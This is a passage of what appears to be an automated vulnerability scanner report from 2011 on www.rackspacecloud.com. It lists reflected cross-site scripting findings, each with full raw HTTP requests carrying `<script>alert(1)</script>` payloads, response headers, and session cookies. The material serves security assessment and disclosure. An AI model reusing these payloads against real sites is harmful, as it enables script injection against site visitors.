GET /aboutus/contact/?4eab9"><script>alert(1)</script>0c9c0306586=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 39207
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.194. http://www.rackspacecloud.com/aboutus/events/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspacecloud.com
Path: /aboutus/events/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e032b"><script>alert(1)</script>4339acd2d66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aboutus/events/?e032b"><script>alert(1)</script>4339acd2d66=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 44013
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.195. http://www.rackspacecloud.com/aboutus/story/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/aboutus/story/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8540"><script>alert(1)</script>995d02061e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aboutus/story/?e8540"><script>alert(1)</script>995d02061e0=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 38522
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.196. http://www.rackspacecloud.com/blog/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/blog/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7b08"><script>alert(1)</script>ee23580c6a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f7b08\"><script>alert(1)</script>ee23580c6a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/?f7b08"><script>alert(1)</script>ee23580c6a6=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d270e"><script>alert(1)</script>6558ea7b56c was submitted in the REST URL parameter 5. This input was echoed as d270e\"><script>alert(1)</script>6558ea7b56c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/2010/12/14/rackspace-will-take-care-of-your-cloud-while-you-manage-your-businessd270e"><script>alert(1)</script>6558ea7b56c/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 16:10:00 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 X-Pingback: http://www.rackspacecloud.com/blog/xmlrpc.php Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 05 Feb 2011 16:10:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 41047
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<ti ...[SNIP]... ttps://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspacecloud.com/blog/2010/12/14/rackspace-will-take-care-of-your-cloud-while-you-manage-your-businessd270e\"><script>alert(1)</script>6558ea7b56c/&optionaldata3=loginpg&optionaldata4=US1ffb86d7e6309d5032693db6bb0255e1&optionaldata5=http://www.google.com/search?hl=en&q=3eeeb%2522%253bdda4ec24089','custclient','width=500,height=320');return f ...[SNIP]...
4.198. http://www.rackspacecloud.com/blog/2010/12/14/rackspace-will-take-care-of-your-cloud-while-you-manage-your-business/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d48b"><script>alert(1)</script>c0b9320fbda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2d48b\"><script>alert(1)</script>c0b9320fbda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/2010/12/14/rackspace-will-take-care-of-your-cloud-while-you-manage-your-business/?2d48b"><script>alert(1)</script>c0b9320fbda=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
The value of the CMP request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b3ef"><script>alert(1)</script>bde34b6d68b was submitted in the CMP parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cloudU?CMP=loginpg8b3ef"><script>alert(1)</script>bde34b6d68b HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-5-2_4--5+6--5_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296919127_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.7.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:36:46 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 44403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.200. http://www.rackspacecloud.com/cloudU [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/cloudU
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d59c2"><script>alert(1)</script>957351c9bd8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cloudU?d59c2"><script>alert(1)</script>957351c9bd8=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-5-2_4--5+6--5_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296919127_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.7.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:37:04 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 44381
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<ti ...[SNIP]... atinvite-wrap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspacecloud.com/cloudU/?d59c2"><script>alert(1)</script>957351c9bd8=1&optionaldata3=loginpg&optionaldata4=US1ffb86d7e6309d5032693db6bb0255e1&optionaldata5=http://www.google.com/search?hl=en&q=4e7adeacdad626b79a66169b','custclient','width=500,height=320');return fa ...[SNIP]...
4.201. http://www.rackspacecloud.com/cloudU/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/cloudU/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de6d9"><script>alert(1)</script>2088ea59228 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cloudU/?de6d9"><script>alert(1)</script>2088ea59228=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:24 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 44382
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<ti ...[SNIP]... atinvite-wrap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspacecloud.com/cloudU/?de6d9"><script>alert(1)</script>2088ea59228=1&optionaldata3=loginpg&optionaldata4=US1ffb86d7e6309d5032693db6bb0255e1&optionaldata5=http://www.google.com/search?hl=en&q=4e7adeacdad626b79a66169b','custclient','width=500,height=320');return fa ...[SNIP]...
4.202. http://www.rackspacecloud.com/cloud_hosting_demos [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/cloud_hosting_demos
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26e8c"><script>alert(1)</script>cc34e1bf5d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cloud_hosting_demos?26e8c"><script>alert(1)</script>cc34e1bf5d3=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:30 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 39978
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.203. http://www.rackspacecloud.com/cloud_hosting_demos/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/cloud_hosting_demos/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab4a7"><script>alert(1)</script>a4f15b11e6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cloud_hosting_demos/?ab4a7"><script>alert(1)</script>a4f15b11e6d=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:23 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 40038
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.204. http://www.rackspacecloud.com/cloud_hosting_faq/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/cloud_hosting_faq/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff8ce"><script>alert(1)</script>e3563e031c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cloud_hosting_faq/?ff8ce"><script>alert(1)</script>e3563e031c6=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:23 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 66230
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.205. http://www.rackspacecloud.com/cloud_hosting_products/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/cloud_hosting_products/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 348a7"><script>alert(1)</script>7d7a4e11ae2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cloud_hosting_products/?348a7"><script>alert(1)</script>7d7a4e11ae2=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 36444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.206. http://www.rackspacecloud.com/cloud_hosting_products/files [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
